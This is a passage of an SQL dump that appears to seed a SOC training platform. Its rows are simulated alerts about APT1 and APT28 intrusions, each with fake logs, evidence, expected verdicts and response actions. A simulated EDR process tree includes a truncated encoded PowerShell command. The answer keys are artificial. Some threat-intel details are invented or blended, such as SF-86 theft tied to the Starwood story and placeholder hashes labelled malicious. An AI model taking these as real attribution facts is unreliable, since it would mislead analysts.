AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(791, 'Exfiltration of Sensitive Personnel Data', 'critical', 'Network traffic analysis', 'With the PlugX RAT in place, APT1 moved laterally to access and exfiltrate sensitive personnel data, including fingerprint records and SF-86 forms, posing a significant threat to national security.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"src_ip\":\"10.0.2.15\",\"dest_ip\":\"203.0.113.45\",\"src_port\":\"443\",\"dest_port\":\"8080\",\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"SF86_form_data.zip\",\"hash\":\"3b1c3497d4f5e7d2a2e8f8b6a9d1c5b2\",\"action\":\"exfiltrate\",\"status\":\"success\"}', '2026-01-11 23:44:22', '2026-02-16 18:00:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known APT1 Command & Control server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3b1c3497d4f5e7d2a2e8f8b6a9d1c5b2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"PlugX RAT payload used in data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"SF86_form_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal File Monitoring\",\"verdict\":\"internal\",\"details\":\"Sensitive personnel data file targeted for exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(792, 'Initial Access: Spear Phishing Campaign', 'medium', 'Email Gateway Logs', 'APT1 initiated their attack with a series of spear-phishing emails aimed at Starwood employees to harvest credentials and establish a foothold in the network.', 'Spear Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T09:15:32Z\",\"email_id\":\"c28f1e5d-f45e-4b6a-9a1f-ec4b1a9b7c1d\",\"sender_email\":\"john.doe@maliciousdomain.com\",\"recipient_email\":\"jane.smith@starwood.com\",\"subject\":\"Urgent: Verify Your Account Information\",\"attachment\":{\"filename\":\"Invoice_2023.pdf\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known to host phishing infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Low detection rate but flagged by multiple engines.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Spear 
Phishing Campaign\",\"date\":\"2026-02-01T20:32:22.440Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(793, 'Execution: Deployment of Remote Access Trojan', 'high', 'Endpoint Detection and Response (EDR) Systems', 'The attackers deployed a custom Remote Access Trojan (RAT) named \'RATDeploy.exe\' on the compromised system. This malware allows the attacker to execute commands remotely and maintain persistent access.', 'Malware Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:45Z\",\"event_id\":\"evt-123456\",\"host_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"process_name\":\"RATDeploy.exe\",\"process_hash\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"user\":\"compromised_user\",\"action\":\"execute\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\Downloads\\\\RATDeploy.exe\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Remote Access Trojan.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"RATDeploy.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used for remote access and command execution.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account on the compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(794, 'Persistence: RAT Maintains Control Post-Acquisition', 'high', 'Network Traffic Analysis', 'APT1 demonstrated advanced persistence techniques by adapting their RAT to remain active and undetected during the transition of network control to Marriott. Network traffic analysis detected unexpected outbound connections to a known malicious IP, indicating a potential RAT communication attempt.', 'Persistence Mechanism', 'T1543 - Create or Modify System Process', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"source_port\":54321,\"destination_port\":8080,\"username\":\"jdoe\",\"process_name\":\"svchost.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"update.dll\",\"event\":\"Outbound Connection\",\"action\":\"Allowed\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT1.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with APT1 RAT payload.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"update.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious DLL loaded by svchost.exe.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User associated with the affected machine during 
acquisition.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(795, 'Lateral Movement: Exploiting Network Trust', 'high', 'Internal Network Logs', 'An attacker utilized stolen credentials to move laterally within the network, exploiting trust relationships to access critical databases containing sensitive guest information.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:34:12Z\",\"source_ip\":\"192.168.1.45\",\"target_ip\":\"10.0.1.5\",\"action\":\"login\",\"username\":\"j.doe\",\"method\":\"RDP\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"db_access_tool.exe\",\"external_ip\":\"203.0.113.55\",\"event_id\":\"4624\",\"description\":\"Successful login using RDP with stolen credentials\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with a known suspicious tool\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"db_access_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"File used to access 
databases\"}},{\"id\":\"artifact_6\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(796, 'Exfiltration: Encrypted Data Transfer', 'high', 'Data Loss Prevention (DLP) Systems', 'APT1 executed the final phase of their operation by encrypting and exfiltrating sensitive guest records, including passport numbers, through a masked data transfer to avoid detection. The transfer was facilitated over a compromised internal server using encrypted channels.', 'Data Exfiltration', 'T1048.001 - Exfiltration Over Alternative Protocol: Encrypted Channels', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:37:45Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.1.45\",\"destination_ip\":\"203.0.113.77\",\"protocol\":\"TLS\",\"filename\":\"guest_data_encrypted.zip\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"user\":\"jdoe\",\"event_id\":\"EXFIL-2023-5678\",\"action\":\"transfer\",\"status\":\"completed\"}', '2026-01-12 22:14:44', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for data transfer\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT1\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with APT1\'s data exfiltration tool\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"guest_data_encrypted.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file encrypted for 
exfiltration\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity_monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account possibly compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event 
count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.444Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:37:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.77\\\",\\\"protocol\\\":\\\"TLS\\\",\\\"filename\\\":\\\"guest_data_encrypted.zip\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"user\\\":\\\"jdoe\\\",\\\"event_id\\\":\\\"EXFIL-2023-5678\\\",\\\"action\\\":\\\"transfer\\\",\\\"status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(797, 'Spear-Phishing Campaign Detected', 'high', 'Email security logs', 'APT28 initiated a spear-phishing campaign targeting DNC staff to gain initial access by harvesting their credentials. The malicious email contained a link leading to a credential harvesting site.', 'Initial Access', 'T1566.001 - Phishing: Spearphishing Link', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"email_id\":\"b1234567890abc\",\"sender\":\"noreply@dnc-support.com\",\"recipient\":\"johndoe@dnc.org\",\"subject\":\"Urgent: Security Update Required\",\"body_preview\":\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\",\"attachment\":\"none\",\"url\":\"http://dnc-security-update.com/login?\",\"sender_ip\":\"198.51.100.23\",\"recipient_ip\":\"192.168.1.45\",\"malicious_hash\":\"e99a18c428cb38d5f260853678922e03\",\"threat_actor\":\"APT28\"}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@dnc-support.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known phishing campaigns by APT28.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://dnc-security-update.com/login?\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing site designed to harvest credentials.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known APT28 infrastructure.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hash Analysis Service\",\"verdict\":\"suspicious\",\"details\":\"Associated with recent phishing 
attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: 
http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: 
http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.445Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"email_id\\\":\\\"b1234567890abc\\\",\\\"sender\\\":\\\"noreply@dnc-support.com\\\",\\\"recipient\\\":\\\"johndoe@dnc.org\\\",\\\"subject\\\":\\\"Urgent: Security Update Required\\\",\\\"body_preview\\\":\\\"Dear John, Please update your credentials immediately by clicking the following link: http://dnc-security-update.com/login?\\\",\\\"attachment\\\":\\\"none\\\",\\\"url\\\":\\\"http://dnc-security-update.com/login?\\\",\\\"sender_ip\\\":\\\"198.51.100.23\\\",\\\"recipient_ip\\\":\\\"192.168.1.45\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"threat_actor\\\":\\\"APT28\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(798, 'X-Agent Implant Executed', 'high', 'Endpoint detection and response (EDR) logs', 'APT28 deployed the X-Agent implant on a compromised system, executing malware to maintain access and collect data. EDR detected the execution of a suspicious binary associated with known APT28 activities.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:18Z\",\"event_id\":\"4625\",\"computer_name\":\"compromised-host.local\",\"user\":\"DOMAIN\\\\compromised_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"process_name\":\"C:\\\\Windows\\\\Temp\\\\xagent.exe\",\"process_hash\":\"f1d2d2f924e986ac86fdf7b36c94bcdf32beec15\",\"command_line\":\"xagent.exe -collect -report\",\"network_activity\":[{\"protocol\":\"TCP\",\"destination_ip\":\"198.51.100.24\",\"destination_port\":443}]}', '2026-01-12 22:16:51', '2026-02-14 16:52:12', 